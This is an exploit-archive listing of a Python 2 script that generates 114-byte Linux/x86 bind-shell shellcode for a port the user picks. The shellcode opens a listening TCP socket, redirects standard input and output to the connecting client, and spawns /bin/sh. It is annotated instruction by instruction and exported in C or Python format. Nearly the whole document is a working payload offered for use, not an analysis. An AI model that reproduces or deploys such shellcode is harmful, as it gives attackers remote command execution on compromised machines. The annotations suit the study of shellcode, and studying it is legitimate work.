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Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
# Title: Linux/x86 - Bind Shell Generator Shellcode (114 bytes) # Author: Bobby Cooke # Tested On: Ubuntu 3.13.0-32-generic #57~precise1-Ubuntu i386 #!/usr/bin/python # Take users TCP port as input port = raw_input("Enter TCP Port Number: ") # Convert input string to an integer deciPort = int(port) # Format the integer to Hex Integer hexPort = "{:02x}".format(deciPort) #print "Hex value of Decimal Number:",hexPort # Check the length of the output hex string hexStrLen = len(hexPort) # Check if the hex string is even or odd with modulus 2 oddEven = hexStrLen % 2 # if it returns 1 then it's odd. We need to add a leading 0 if oddEven == 1: hexPort = "0" + hexPort # converts the port number into the correct hex format tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2)) print "Your TCP Port in Hex is:","\\x"+tcpPort nullCheck = deciPort % 256 if nullCheck == 0 : print "Your TCP Port contains a Null 0x00." print "Try again with a different Port Number." exit(0) # 1. Create a new Socket # <socketcall> ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 ); # EAX=0x66 EBX ECX[0] ECX[1] ECX[2] scPart1 = "\x31\xc0" # xor eax, eax; This sets the EAX Register to NULL (all zeros). scPart1 += "\xb0\x66" # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall scPart1 += "\x31\xdb" # xor ebx, ebx; This sets the EBX Register to NULL (all zeros). scPart1 += "\xb3\x01" # mov bl, 0x1; EBX is set to create a socket scPart1 += "\x31\xc9" # xor ecx, ecx; This sets the ECX Register to NULL (all zeros). scPart1 += "\x51" # push ecx; ECX[2]. ECX is NULL scPart1 += "\x53" # push ebx; ECX[1]. EBX already has the value we need for ECX[1] scPart1 += "\x6a\x02" # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET. scPart1 += "\x89\xe1" # mov ecx, esp ; ECX now holds the pointer to the arg array scPart1 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes socket(). scPart1 += "\x96" # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI # 2. Create TCP-IP Address and Bind the Address to the Socket # struct sockaddr_in ipSocketAddr = { # .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY}; # ARG[0] ARG[1] ARG[2] #<socketcall> bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr)); # EAX=0x66 EBX ECX[0] ECX[1] ECX[2] scPart1 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros). scPart1 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall scPart1 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros). scPart1 += "\xb3\x02" # mov bl, 0x2 ; EBX is set to create a socket scPart1 += "\x31\xd2" # xor edx, edx ; This sets the EDX Register to NULL (all zeros). scPart1 += "\x52" # push edx ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY. scPart1 += "\x66\x68" # push word 0x?? ; ; ARG[1]. This is for the TCP Port # #tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11 scPart2 = "\x66\x53" # push bx ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET. scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the EAX Register to NULL (all zeros). scPart2 += "\x89\xe1" # mov ecx, esp ; Save the memory location of ARG[0] into the EDX Register. scPart2 += "\x6a\x10" # push 0x10 ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex). scPart2 += "\x51" # push ecx ; ECX[1]. The pointer to the beginning of the struct we saved scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier. scPart2 += "\x89\xe1" # mov ecx, esp ; Now we need to point ECX to the top of the loaded stack. scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 # 4. Listen for incoming connections on TCP-IP Socket. # <socketcall> listen( ipv4Socket, 0 ); # EAX=0x66 EBX ECX[0] ECX[1] scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros). scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros). scPart2 += "\xb3\x04" # mov bl, 0x4 ; EBX is set to listen(). scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros). scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack. scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier. scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack. scPart2 += "\xcd\x80" # int 0x80 ; Executes listen(). Allowing us to handle incoming TCP-IP Connections. # 5. Accept the incoming connection, and create a connected session. # <socketcall> clientSocket = accept( ipv4Socket, NULL, NULL ); # EAX=0x66 EBX ECX[0] ECX[1] ECX[2] scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros). scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros). scPart2 += "\xb3\x05" # mov bl, 0x5 ; EBX is set to accept(). scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros). scPart2 += "\x51" # push ecx ; ECX[2]. Push the value 0x0 to the stack. scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack. scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier. scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack. scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 scPart2 += "\x93" # xchg ebx, eax ; The created clientSocket is stored in EAX after receiving a connection. # 6. Transfer STDIN, STDOUT, STDERR to the connected Socket. # dup2( clientSocket, 0 ); // STDIN # dup2( clientSocket, 1 ); // STDOUT # dup2( clientSocket, 2 ); // STDERR # EAX EBX ECX scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros). scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros). scPart2 += "\xb1\x02" # mov cl, 0x2 ; This sets the loop counter, and # ; will also be the value of "int newfd" for the 3 dup2 SYSCAL's. #dup2Loop: ; Procedure label for the dup2 Loop. scPart2 += "\xb0\x3f" # mov al, 0x3f ; EAX is now 0x0000003F = SYSCALL 63 - dup2 scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes accept(). # ; Allowing us to create connected Sockets. scPart2 += "\x49" # dec ecx ; Decrements ECX by 1 scPart2 += "\x79\xf9" # jns dup2Loop /jns short -5 ; Jump back to the dup2Loop Procedure until ECX equals 0. # 7. Spawn a "/bin/sh" shell for the client, in the connected session. # execve("/bin//sh", NULL, NULL); # EAX EBX ECX EDX scPart2 += "\x52" # push edx ; Push NULL to terminate the string. scPart2 += "\x68\x2f\x2f\x73\x68" # push 0x68732f2f ; "hs//" - Needs to be 4 bytes to fit on stack properly scPart2 += "\x68\x2f\x62\x69\x6e" # push 0x6e69622f ; "nib/" - This is "/bin//sh" backwards. scPart2 += "\x89\xe3" # mov ebx, esp ; point ebx to stack where /bin//sh +\x00 is located scPart2 += "\x89\xd1" # mov ecx, edx ; NULL scPart2 += "\xb0\x0b" # mov al, 0xb ; execve System Call Number - 11 scPart2 += "\xcd\x80" # int 0x80 ; execute execve with system call interrupt # Initiate the Shellcode variable we will output shellcode = "" # Add the first part of the tcp bind shellcode for x in bytearray(scPart1) : shellcode += '\\x' shellcode += '%02x' %x # Add the user added tcp port to the shellcode shellcode += "\\x"+tcpPort # Add the second part of the tcp bind shellcode for x in bytearray(scPart2) : shellcode += '\\x' shellcode += '%02x' %x print "Choose your shellcode export format." exportFormat = raw_input("[1] = C Format\n[2] = Python Format\n[1]: ") if exportFormat == "2" : formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48)) print "[-----------------------Your-Shellcode------------------------]" print 'shellcode = "'+formatSC+'"' else : formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48)) print "[----------------Your-Shellcode------------------]" print ' unsigned char shellcode[] = \\\n"'+formatSC+'";' # 0day.today [2024-11-14] #